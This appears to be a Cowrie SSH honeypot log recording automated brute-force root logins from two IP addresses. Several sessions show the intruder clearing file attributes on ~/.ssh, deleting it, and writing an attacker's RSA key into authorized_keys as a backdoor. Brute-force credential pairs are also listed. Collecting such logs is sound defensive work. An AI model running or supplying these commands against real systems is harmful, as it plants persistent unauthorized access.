{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:09:15.025679Z","src_ip":"212.227.235.229","session":"895360565272"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:09:15.798155Z","src_ip":"212.227.235.229","session":"895360565272"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:09:15.982413Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:09:15.983260Z","src_ip":"212.227.235.229","session":"895360565272"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42356,"dst_ip":"1.2.3.4","dst_port":22,"session":"07a11db52635","protocol":"ssh","message":"New connection: 212.227.235.229:42356 (1.2.3.4:22) [session: 07a11db52635]","sensor":"my-vps","timestamp":"2025-08-28T15:10:18.520955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:10:18.521825Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:10:18.706913Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123@","message":"login attempt [root/qwerty123@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:10:19.489843Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:10:19.876719Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:10:19.877541Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:10:19.878512Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:10:20.073232Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:10:20.500509Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:10:20.501471Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:10:20.688056Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:10:20.689031Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42970,"dst_ip":"1.2.3.4","dst_port":22,"session":"dde31542a3b3","protocol":"ssh","message":"New connection: 212.227.235.229:42970 (1.2.3.4:22) [session: dde31542a3b3]","sensor":"my-vps","timestamp":"2025-08-28T15:10:20.867997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:10:20.868896Z","src_ip":"212.227.235.229","session":"dde31542a3b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:10:21.051312Z","src_ip":"212.227.235.229","session":"dde31542a3b3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:10:21.822766Z","src_ip":"212.227.235.229","session":"dde31542a3b3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:10:23.008056Z","src_ip":"212.227.235.229","session":"dde31542a3b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44102,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ca85d40738a","protocol":"ssh","message":"New connection: 212.227.235.229:44102 (1.2.3.4:22) [session: 4ca85d40738a]","sensor":"my-vps","timestamp":"2025-08-28T15:10:23.188112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:10:23.189303Z","src_ip":"212.227.235.229","session":"4ca85d40738a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:10:23.369010Z","src_ip":"212.227.235.229","session":"4ca85d40738a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:10:24.127941Z","src_ip":"212.227.235.229","session":"4ca85d40738a"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":19956,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6e24bc8122","protocol":"ssh","message":"New connection: 80.94.95.15:19956 (1.2.3.4:22) [session: 0f6e24bc8122]","sensor":"my-vps","timestamp":"2025-08-28T15:10:24.159569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:10:24.160306Z","src_ip":"80.94.95.15","session":"0f6e24bc8122"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:10:24.216744Z","src_ip":"80.94.95.15","session":"0f6e24bc8122"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:10:24.308789Z","src_ip":"212.227.235.229","session":"07a11db52635"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:10:24.309726Z","src_ip":"212.227.235.229","session":"4ca85d40738a"}
{"eventid":"cowrie.login.failed","username":"jose","password":"jose","message":"login attempt [jose/jose] failed","sensor":"my-vps","timestamp":"2025-08-28T15:10:24.503874Z","src_ip":"80.94.95.15","session":"0f6e24bc8122"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abc123","message":"login attempt [jose/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:10:25.558497Z","src_ip":"80.94.95.15","session":"0f6e24bc8122"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abcd123","message":"login attempt [jose/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:10:26.611938Z","src_ip":"80.94.95.15","session":"0f6e24bc8122"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abcd1234","message":"login attempt [jose/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:10:27.665990Z","src_ip":"80.94.95.15","session":"0f6e24bc8122"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abc1234","message":"login attempt [jose/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:10:28.721445Z","src_ip":"80.94.95.15","session":"0f6e24bc8122"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:10:29.775314Z","src_ip":"80.94.95.15","session":"0f6e24bc8122"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40670,"dst_ip":"1.2.3.4","dst_port":22,"session":"a751dad26b16","protocol":"ssh","message":"New connection: 212.227.235.229:40670 (1.2.3.4:22) [session: a751dad26b16]","sensor":"my-vps","timestamp":"2025-08-28T15:11:25.956964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:11:25.957690Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:11:26.137353Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.login.success","username":"root","password":"@bcd1234","message":"login attempt [root/@bcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:11:26.896479Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:11:27.666999Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:11:27.667730Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:11:27.668575Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:11:27.849466Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:11:28.229722Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:11:28.230384Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:11:28.411974Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:11:28.412847Z","src_ip":"212.227.235.229","session":"a751dad26b16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41358,"dst_ip":"1.2.3.4","dst_port":22,"session":"935c8e918f24","protocol":"ssh","message":"New connection: 212.227.235.229:41358 (1.2.3.4:22) [session: 935c8e918f24]","sensor":"my-vps","timestamp":"2025-08-28T15:11:28.591650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:11:28.592651Z","src_ip":"212.227.235.229","session":"935c8e918f24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:11:28.772993Z","src_ip":"212.227.235.229","session":"935c8e918f24"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:11:29.536464Z","src_ip":"212.227.235.229","session":"935c8e918f24"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:11:30.720019Z","src_ip":"212.227.235.229","session":"935c8e918f24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42362,"dst_ip":"1.2.3.4","dst_port":22,"session":"34d713e4f650","protocol":"ssh","message":"New connection: 212.227.235.229:42362 (1.2.3.4:22) [session: 34d713e4f650]","sensor":"my-vps","timestamp":"2025-08-28T15:11:30.904250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:11:30.905186Z","src_ip":"212.227.235.229","session":"34d713e4f650"}
